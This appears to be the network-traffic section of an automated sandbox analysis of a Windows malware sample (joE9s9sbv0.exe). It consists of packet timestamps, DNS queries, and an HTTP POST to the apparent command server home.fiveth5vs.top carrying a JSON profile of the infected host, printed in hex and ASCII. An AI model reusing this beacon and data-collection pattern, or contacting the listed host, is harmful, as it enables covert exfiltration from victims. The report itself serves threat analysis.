                                Dec 31, 2024 15:42:07.084538937 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084548950 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084585905 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084594965 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084635973 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084645033 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084670067 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084690094 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084707022 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084716082 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084750891 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084759951 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084786892 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084795952 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084837914 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084847927 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084888935 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084904909 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084920883 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084933043 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084956884 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084975958 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.084991932 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085001945 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085031033 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085040092 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085074902 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085091114 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085108042 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085124969 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085153103 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085163116 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085210085 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085220098 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085243940 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085253000 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085263014 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085272074 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085298061 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085305929 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085330009 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085347891 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085365057 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085374117 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085407972 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085417032 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085458040 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085468054 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085510969 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085520983 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085557938 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085575104 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085598946 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085608959 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085624933 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085633993 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085665941 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085675955 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085700989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085711002 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085738897 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085747957 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085774899 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085784912 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085812092 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.085820913 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088417053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088429928 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088536024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088546991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088556051 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088565111 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088577032 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.088587046 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.090399981 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.090492964 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.095383883 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095397949 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095416069 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095426083 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095443964 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095463991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095480919 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095490932 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095525026 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095535040 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095585108 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095594883 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095623970 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095633984 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095662117 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095679045 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095768929 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095779896 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095810890 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095819950 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095906019 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095916986 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095935106 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095943928 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095959902 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095978022 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.095993996 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096004009 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096082926 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096101046 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096111059 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096118927 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096136093 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096146107 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096177101 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096185923 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096251011 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096260071 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096288919 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096298933 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096324921 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096333981 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096360922 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096379042 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096405029 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096415043 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096424103 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096458912 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096476078 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096484900 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096508026 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096517086 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.096525908 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.099442959 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.099526882 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.104408979 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104427099 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104465961 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104484081 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104501963 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104513884 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104532957 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104547024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104573965 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104583979 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104636908 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104654074 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104686975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104696989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104734898 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104744911 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104774952 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104798079 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104825020 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104830027 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.104835987 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104875088 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104886055 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104923964 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104934931 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104969025 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104978085 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105014086 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105027914 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105073929 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105088949 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105113983 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105123043 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105154991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105165005 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105200052 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105249882 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105259895 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105292082 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105308056 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105315924 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105324984 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105345011 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105361938 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105372906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105397940 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105416059 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105434895 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105452061 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105468035 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105477095 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105504990 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105514050 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105523109 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109637976 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109683037 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109709024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109762907 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109812975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109822989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109869003 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109878063 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109916925 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109937906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109961987 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109976053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109986067 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110009909 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110019922 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110028982 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110234022 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110313892 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110323906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110352039 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110362053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110409975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110419989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110446930 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110466003 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110496044 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110505104 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110518932 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110534906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110551119 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110559940 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110590935 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110608101 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110618114 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.151458025 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.666174889 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.674068928 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:09.683135033 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.683247089 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.831590891 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.836409092 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:10.836572886 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.837517023 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.842303991 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.620419979 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.620979071 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:11.625956059 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.626013041 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.464764118 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.469603062 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:12.469763994 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.469966888 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.474805117 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.348244905 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.348788977 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:13.353780031 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.353899002 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:23.271250963 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.276216984 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.278846025 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.283834934 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.725989103 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.730951071 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.731004000 CET5211653192.168.2.101.1.1.1
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 15:42:03.514919043 CET6307253192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:03.514991045 CET6307253192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:03.522161007 CET53630721.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:03.522181988 CET53630721.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:05.846550941 CET6307553192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:05.846730947 CET6307553192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:06.451459885 CET53630751.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:06.559683084 CET53630751.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:09.973026037 CET6307753192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:09.973100901 CET6307753192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:10.640821934 CET53630771.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:10.830311060 CET53630771.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:11.686325073 CET6307953192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:11.686402082 CET6307953192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:12.064359903 CET53630791.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:12.463388920 CET53630791.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.269282103 CET53635431.1.1.1192.168.2.10
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 31, 2024 15:42:03.514919043 CET192.168.2.101.1.1.10xd27Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:03.514991045 CET192.168.2.101.1.1.10x7b62Standard query (0)httpbin.org28IN (0x0001)false
                                Dec 31, 2024 15:42:05.846550941 CET192.168.2.101.1.1.10x39fbStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:05.846730947 CET192.168.2.101.1.1.10x79bcStandard query (0)home.fiveth5vs.top28IN (0x0001)false
                                Dec 31, 2024 15:42:09.973026037 CET192.168.2.101.1.1.10x558cStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:09.973100901 CET192.168.2.101.1.1.10xb0b6Standard query (0)home.fiveth5vs.top28IN (0x0001)false
                                Dec 31, 2024 15:42:11.686325073 CET192.168.2.101.1.1.10xb686Standard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:11.686402082 CET192.168.2.101.1.1.10x2f46Standard query (0)home.fiveth5vs.top28IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 31, 2024 15:42:03.522161007 CET1.1.1.1192.168.2.100xd27No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:03.522161007 CET1.1.1.1192.168.2.100xd27No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:06.559683084 CET1.1.1.1192.168.2.100x39fbNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:10.830311060 CET1.1.1.1192.168.2.100x558cNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:42:12.064359903 CET1.1.1.1192.168.2.100xb686No error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                                • httpbin.org
                                • home.fiveth5vs.top
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.1049705176.53.146.223802788C:\Users\user\Desktop\joE9s9sbv0.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 15:42:06.587050915 CET12360OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 500830
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 35 35 31 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627455163", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 31, 2024 15:42:06.591928959 CET2472OUTData Raw: 53 6e 31 2b 58 36 6b 4c 78 38 68 5c 2f 66 5c 2f 50 36 5c 2f 77 43 66 52 74 57 4b 5c 2f 55 58 5c 2f 41 49 4a 54 66 38 45 39 5c 2f 77 42 6e 37 39 73 48 77 68 38 61 50 6a 52 2b 30 68 6f 6d 71 5c 2f 45 57 32 38 4f 66 46 37 57 50 68 44 34 4e 38 46 70
                                Data Ascii: Sn1+X6kLx8h\/f\/P6\/wCfRtWK\/UX\/AIJTf8E9\/wBn79sHwh8aPjR+0homq\/EW28OfF7WPhD4N8Fp4q8WeFNG0K38L+HvDWv6jrck\/g7WtA1S8u9UXxZp1tDA2opZ2x028uJra6nv0ktv5s+kl9ISXgFk3CmIwHBz42z7jDO8VlWWZXX4g\/wBVsrw+Hy3Lq2ZZlmGZZ3DJeI8TRjRpxoUMNhsLkeNq4rEYmKlLDUadSt
                                Dec 31, 2024 15:42:06.591974974 CET4944OUTData Raw: 41 6e 72 30 36 6e 70 54 4b 44 59 70 6e 5c 2f 6c 6e 2b 48 39 4b 67 66 70 2b 50 39 44 56 33 59 33 70 5c 2f 4c 5c 2f 47 6f 5a 46 63 37 44 39 5c 2f 5c 2f 41 44 5c 2f 50 74 37 66 6a 51 58 44 66 35 66 71 69 6d 56 5c 2f 75 4a 5c 2f 35 46 2b 6e 58 5c 2f
                                Data Ascii: Anr06npTKDYpn\/ln+H9Kgfp+P9DV3Y3p\/L\/GoZFc7D9\/\/AD\/Pt7fjQXDf5fqimV\/uJ\/5F+nX\/AOtUPl\/3\/wDv3x\/k\/wCce1n\/AFf8Hz\/z9P8AP+NM+9nZ+Ht9f8\/nQdpW\/wB\/HXn\/ACe9Qp0\/7ZD+bVafr+H9TUbf6vZs\/Dn\/ADx+v8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+
                                Dec 31, 2024 15:42:06.591991901 CET4944OUTData Raw: 34 73 2b 4a 58 78 74 38 45 5c 2f 45 44 34 69 65 45 37 43 62 34 6e 58 6e 69 54 58 5a 66 45 50 77 39 38 52 66 44 54 77 48 70 45 6c 31 34 70 38 4f 36 5c 2f 34 4d 73 4e 64 31 36 2b 31 44 52 76 46 57 70 61 46 66 65 4b 64 4d 31 53 37 38 4e 61 62 6f 74
